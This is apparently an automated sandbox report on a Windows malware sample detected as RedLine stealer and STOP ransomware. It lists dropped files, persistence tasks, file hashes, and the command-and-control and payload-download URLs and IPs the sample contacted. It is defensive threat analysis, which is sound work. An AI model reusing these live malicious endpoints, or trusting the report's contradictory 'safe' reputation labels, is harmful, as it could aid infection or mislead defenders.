Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	25 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\beirutt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4434343.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C676.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C4AA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\43D0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\43D0.exe	67%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Local\Temp\4434343.dll	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\C4AA.exe	43%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\C676.exe	81%	ReversingLabs	Win32.Trojan.RedLine

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.3.C4AA.exe.df30000.1.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
6.2.C676.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1213203	Download File
9.3.C4AA.exe.df30000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
9.2.C4AA.exe.2d80000.2.unpack	100%	Avira	HEUR/AGEN.1228718	Download File
0.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.file.exe.5c0e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.ngentask.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
10.2.43D0.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
0.3.file.exe.5d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
potunulit.org	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://potunulit.org/	0%	URL Reputation	safe
http://potunulit.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Responsel	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Responsel	0%	URL Reputation	safe
http://novanosa5org.org/	0%	URL Reputation	safe
http://novanosa5org.org/	0%	URL Reputation	safe
http://golilopaster.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14Responsel	0%	URL Reputation	safe
http://bulimu55t.net/	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id3Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://ryjphgb.com/pace	0%	Avira URL Cloud	safe
http://fedface.com/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id18Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Responsel	0%	URL Reputation	safe
http://ryjphgb.com/	0%	Avira URL Cloud	safe
http://potunulit.org:80/N	100%	Avira URL Cloud	malware
http://potunulit.org/J2v-m	100%	Avira URL Cloud	malware
http://109.206.243.168/upload/libcurl.dllw	0%	Avira URL Cloud	safe
http://fedface.com/	0%	Virustotal		Browse
http://aygtqn.org/tem/W	0%	Avira URL Cloud	safe
http://drampik.com/lancer/get.php	100%	Avira URL Cloud	malware
http://egqgnqk.org/	0%	Avira URL Cloud	safe
http://egqgnqk.org/s	0%	Avira URL Cloud	safe
89.208.103.88:37538	0%	Avira URL Cloud	safe
http://109.206.243.168/upload/libcurl.dll	0%	Avira URL Cloud	safe
http://potunulit.org/s	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
potunulit.org	188.114.96.3	true	true	11%, Virustotal, Browse	unknown
api.2ip.ua	162.0.217.254	true	false		high
gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://potunulit.org/	true	URL Reputation: safe URL Reputation: safe	unknown
http://novanosa5org.org/	true	URL Reputation: safe URL Reputation: safe	unknown
http://golilopaster.org/	true	URL Reputation: safe	unknown
http://bulimu55t.net/	true	URL Reputation: safe	unknown
http://drampik.com/lancer/get.php	true	Avira URL Cloud: malware	unknown
89.208.103.88:37538	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ryjphgb.com/pace	explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fedface.com/	explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://potunulit.org/J2v-m	explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id7	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id7Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id14Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	C4AA.exe, 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://109.206.243.168/upload/libcurl.dllw	fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ryjphgb.com/	explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id20	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1Response	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://potunulit.org:80/N	explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aygtqn.org/tem/W	explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://egqgnqk.org/	explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id3Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://egqgnqk.org/s	explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id17Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id17	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id18Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://109.206.243.168/upload/libcurl.dll	fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://potunulit.org/s	explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id21Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	potunulit.org	European Union	13335	CLOUDFLARENETUS	true
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
89.208.103.88	unknown	Russian Federation	42569	PSKSET-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791287
Start date and time:	2023-01-25 09:26:11 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@17/6@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 83% (good quality ratio 75.2%) Quality average: 69.9% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): login.live.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:28:00	API Interceptor	526x Sleep call for process: explorer.exe modified
09:28:11	Task Scheduler	Run new task: Firefox Default Browser Agent FC7EB6D179CBBFEC path: C:\Users\user\AppData\Roaming\beirutt
09:29:16	Task Scheduler	Run new task: svcupdater path: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	718848
Entropy (8bit):	7.8663391957867645
Encrypted:	false
SSDEEP:	12288:XQc1wGGrXn8rDAG7ps+O6TuFlgflEKK9LcFXTASviKWBNbaPSFS:XTwGGrsASprtEKK9wF0SrWBQKFS
MD5:	0A006808F7AA017CAF2DF9CE9E2B55A2
SHA1:	63F5B0E9FE5E3DAEBDBFC8AA168AB163E436AC32
SHA-256:	F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05
SHA-512:	8AD4C111BF0904EB739A462E274C7A2FD9EC1AFB2DB7D77F176B26438520C4859B2CCB46A4C76F206E20B4584E434E1D78B26DCD042F08B3D573BB99036E8C73
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..Y.pl..pl..pl.."...pl.."..rpl.(....pl..pm..pl.."..,pl.."...pl.."...pl.Rich.pl.................PE..L......a.....................Z......6x............@.........................................................................,...d....p..P,..........................P................................Z..@............................................text.............................. ..`.data............4..................@....rsrc...P,...p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4434343.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\C4AA.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	343040
